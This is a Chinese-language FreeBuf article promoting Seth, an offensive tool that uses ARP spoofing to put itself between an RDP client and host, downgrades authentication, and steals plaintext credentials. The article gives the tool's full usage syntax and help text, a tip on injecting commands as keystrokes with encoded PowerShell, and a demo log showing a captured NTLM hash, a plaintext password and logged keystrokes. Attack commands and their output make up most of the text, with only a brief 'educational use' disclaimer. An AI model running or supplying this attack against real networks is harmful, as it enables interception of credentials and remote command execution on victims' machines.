Seth:执行MitM攻击并从RDP连接中提取明文凭证 – 作者:周大涛

Seth是一个用Python编写,试图降级RDP连接来提取明文凭据的工具。

用法

像这样运行:

$ ./seth.sh <INTERFACE> <ATTACKER IP> <VICTIM IP> <GATEWAY IP|HOST IP> [<COMMAND>]

除非RDP主机与受害计算机位于同一子网上,否则最后一个IP地址必须是网关的IP地址。

最后一个参数是可选的。它可以通过注入按键事件模拟WIN + R在RDP主机上执行的命令。注入按键取决于受害者使用的键盘布局 – 目前它仅在英语美国版上可用。我建议避免使用特殊字符powershell -enc <STRING>,其中STRING是您的UTF-16le和Base64编码命令。

shell脚本执行ARP欺骗以获得Man-in-the-Middle位置并重定向流量,使其通过RDP代理运行。代理可以单独调用。可将Seth与Responder结合使用。使用Responder获得Man-in-the-Middle位置并同时运行Seth。运行seth.py -h以获取更多信息:

usage: seth.py [-h] [-d] [-f] [-p LISTEN_PORT] [-b BIND_IP] [-g {0,1,3,11}]
               [-j INJECT] -c CERTFILE -k KEYFILE
               target_host [target_port]
RDP credential sniffer -- Adrian Vollmer, SySS GmbH 2017
positional arguments:
  target_host           目标主机
  target_port           目标RDP服务的TCP端口(默认为3389)
optional arguments:
  -h, --help            显示此帮助消息并退出
  -d, --debug           显示调试信息
  -f, --fake-server     执行'虚假的服务器'攻击
  -p LISTEN_PORT, --listen-port LISTEN_PORT
                        要侦听的TCP端口(默认为3389)
  -b BIND_IP, --bind-ip BIND_IP
                        绑定虚假服务的IP地址(默认全部)
  -g {0,1,3,11}, --downgrade {0,1,3,11}
                        将身份验证协议降级为此(默认值3)
  -j INJECT, --inject INJECT
                        命令通过按键事件注入执行
  -c CERTFILE, --certfile CERTFILE
                        证书文件的路径
  -k KEYFILE, --keyfile KEYFILE
                        密钥文件的路径

您还可以在Youtube上观看二十分钟的演示,包括演示(从14:00开始):https://www.youtube.com/watch?v=wdPkY7gykf4

或者只在这里观看演示(带字幕):https://www.youtube.com/watch?v=JvvxTNrKV-s

演示

以下输出显示了攻击者的视图。Seth嗅探了一个离线的可破解哈希以及明文密码。在这里,NLA没有强制执行,受害者忽略了证书警告。

# ./seth.sh eth1 192.168.57.{103,2,102}
███████╗███████╗████████╗██╗  ██╗
██╔════╝██╔════╝╚══██╔══╝██║  ██║   by Adrian Vollmer
███████╗█████╗     ██║   ███████║   [email protected]
╚════██║██╔══╝     ██║   ██╔══██║   SySS GmbH, 2017
███████║███████╗   ██║   ██║  ██║   https://www.syss.de
╚══════╝╚══════╝   ╚═╝   ╚═╝  ╚═╝
[*] Spoofing arp replies...
[*] Turning on IP forwarding...
[*] Set iptables rules for SYN packets...
[*] Waiting for a SYN packet to the original destination...
[+] Got it! Original destination is 192.168.57.102
[*] Clone the x509 certificate of the original destination...
[*] Adjust the iptables rule for all packets...
[*] Run RDP proxy...
Listening for new connection
Connection received from 192.168.57.103:50431
Downgrading authentication options from 11 to 3
Enable SSL
alice::avollmer-syss:1f20645749b0dfd5:b0d3d5f1642c05764ca28450f89d38db:0101000000000000b2720f48f5ded2012692fcdbf5c79a690000000002001e004400450053004b0054004f0050002d0056004e0056004d0035004f004e0001001e004400450053004b0054004f0050002d0056004e0056004d0035004f004e0004001e004400450053004b0054004f0050002d0056004e0056004d0035004f004e0003001e004400450053004b0054004f0050002d0056004e0056004d0035004f004e0007000800b2720f48f5ded20106000400020000000800300030000000000000000100000000200000413a2721a0d955c51a52d647289621706d6980bf83a5474c10d3ac02acb0105c0a0010000000000000000000000000000000000009002c005400450052004d005300520056002f003100390032002e003100360038002e00350037002e00310030003200000000000000000000000000
Tamper with NTLM response
TLS alert access denied, Downgrading CredSSP
Connection lost
Connection received from 192.168.57.103:50409
Listening for new connection
Enable SSL
Connection lost
Connection received from 192.168.57.103:50410
Listening for new connection
Enable SSL
Hiding forged protocol request from client
.\alice:ilovebob
Keyboard Layout: 0x409 (English_United_States)
Key press:   LShift
Key press:   S
Key release:                 S
Key release:                 LShift
Key press:   E
Key release:                 E
Key press:   C
Key release:                 C
Key press:   R
Key release:                 R
Key press:   E
Key release:                 E
Key press:   T
Key release:                 T
Connection lost
[*] Cleaning up...
[*] Done.

要求

1.python3

2.tcpdump

3.`arpspoof

4.arpspoof

5.`openssl

最后

使用风险由您自己承担。未经所有相关人员的完全同意,请勿使用。仅用于教育目的。

*参考来源:GitHub,FB小编周大涛编译,转载请注明来自FreeBuf.COM

来源:freebuf.com 2019-09-19 01:00:34 by: 周大涛

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享
评论 抢沙发

请登录后发表评论